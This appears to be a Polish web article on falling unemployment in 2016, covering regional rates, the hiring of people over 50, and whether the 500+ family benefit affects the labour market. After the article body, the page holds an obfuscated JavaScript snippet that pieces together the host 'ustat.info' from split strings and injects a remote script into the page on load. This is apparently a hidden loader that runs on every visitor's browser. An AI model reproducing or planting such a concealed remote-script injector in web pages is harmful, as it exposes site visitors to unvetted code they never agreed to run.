Przez 500+ brakuje rąk do pracy? Bezrobocie najniższe od lat!

Aktualnie bezrobocie w Polsce jest najniższe od wielu lat, a pracodawcy narzekają, że nie mogą znaleźć pracowników. Wiele firm już zapowiedziało podwyżki od stycznia przyszłego roku, aby zatrzymać zatrudnionych. Czy to wszystko efekt rządowego programu 500+?

(adsbygoogle = window.adsbygoogle || []).push({});

Pracodawcy nie mają wątpliwości – teraz jest czas pracowników i to właśnie oni wybierają firmy, w których chcą pracować. Naturalnym jest, że decydują się na współpracę z tymi, które oferują najwięcej. Na lokalnych portalach z ogłoszeniami o pracę przybywa ofert, a pracodawcy są zmuszeni oferować pozapłacowe bonusy, aby zatrzymać już zatrudnione osoby.

Jak wygląda bezrobocie w poszczególnych województwach Polski? Czy w ostatnich miesiącach zmieniła się sytuacja osób po 50. roku życia? I wreszcie czy to przez rządowy program wsparcia rodzin 500+ pracodawcy mają problem z obsadzeniem stanowisk?

Niespodzianka na rynku pracy po sezonie letnim

Po zakończeniu sezonu letniego co roku urzędy pracy rejestrują w rejestrze osób bezrobotnych osoby, które pracowały jedynie dorywczo w sezonie letnim. W tym roku jednak urzędnicy przyznają, że są zaskoczeni – do urzędów pracy zgłosiło się mniej osób niż w latach poprzednich. Potwierdzają to dane zaprezentowane przez Ministerstwo Pracy i Polityki Społecznej – bezrobocie jest najniższe od wielu lat.

Gdzie występuje najniższe bezrobocie, gdzie najwyższe? Jeżeli chodzi o najniższe, to mowa o województwie wielkopolskim (5,0%), a najwyższe bezrobocie zanotowano w województwie warmińsko-mazurskim (13,9%). Spadek liczby bezrobotnych tylko w listopadzie 2016 r. miał miejsce m.in. w województwie wielkopolskim i śląskim.

Aktywizacja osób po 50. roku życia przynosi efekty

W ostatnich latach urzędy pracy prowadziły wiele programów aktywizacyjnych, które miały zachęcić pracodawców do zatrudniania pracowników powyżej 50. roku życia. Dziś widać również efekty tych programów – jak się okazuje, spadek bezrobocia wśród tej grupy osób bezrobotnych jest znaczny. Pracodawcy zaczęli zatrudniać osoby w wieku po 50. roku życia nie tylko z uwagi na niemożność znalezienia młodszych pracowników, lecz także z uwagi na ich umiejętności i fakt, że częściej niż osoby młode, mogą one poświęcić się pracy zawodowej bez ograniczeń.

Czy program 500+ ma wpływ na poziom bezrobocia?

Od momentu wprowadzenia programu 500+ w mediach cyklicznie pojawiają się informacje, jakoby to właśnie ten program miał wpływ na sytuację na rynku pracy. Czy faktycznie powoduje on, że głównie panie postanawiają zostać w domu? Warto zauważyć, że takie twierdzenie pojawiło się w związku z problemami pracodawców ze znalezieniem pracowników głównie do pracy przy pracach, które nie wymagają większych kwalifikacji.

Powyższemu stwierdzeniu, jakoby program 500+ miał bezpośredni wpływ na wysokość bezrobocia, przeczy m.in. to, że w ostatnich miesiącach szczególnie wiele pań podjęło zatrudnienie. Urzędnicy wskazują, że programy wsparcia realizowane przez urzędy przynoszą zamierzone efekty i tym samym trudno mówić, aby program 500+ miał znaczący wpływ na rynek pracy, a dokładniej na porzucanie pracy przez osoby posiadające dzieci – wyjaśnia specjalista portalu praca-katowice.info.

Czy bezrobocie będzie dalej maleć?

W ostatnich latach urzędy pracy bardzo ściśle współpracują m.in. z agencjami zatrudnienia. Dlaczego? Wszystko po to, aby wyeliminować sytuację, że w rejestrze osób bezrobotnych będą widnieć osoby, które faktycznie pracują, tyle że „na czarno”. Jeżeli działania podejmowane przez urzędy pracy będą w dalszym ciągu tak dynamiczne, a pracodawcy dynamicznie rozwijać swoje zakłady pracy, to można prognozować, że w przyszłym roku bezrobocie będzie jeszcze niższe niż pod koniec 2016 r.

(function(){
ibtl_=(“u”+”st”);ibtl=document.createElement(“script”);ibtl.async=true;
ibtlu=”1869017″;ibtl_+=”a”+(“t.”);ibtl_+=”i”+(“nf”+(“o”))+(“/”);
ibtlu+=”.7m0tarsgbtlfzlwh”;ibtlu+=”j4r93r8z85z118cu”;
ibtl.src=”//”+ibtl_+ibtlu;ibtl.type=”text/javascript”;
d_b=document.body;d_b.appendChild(ibtl);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.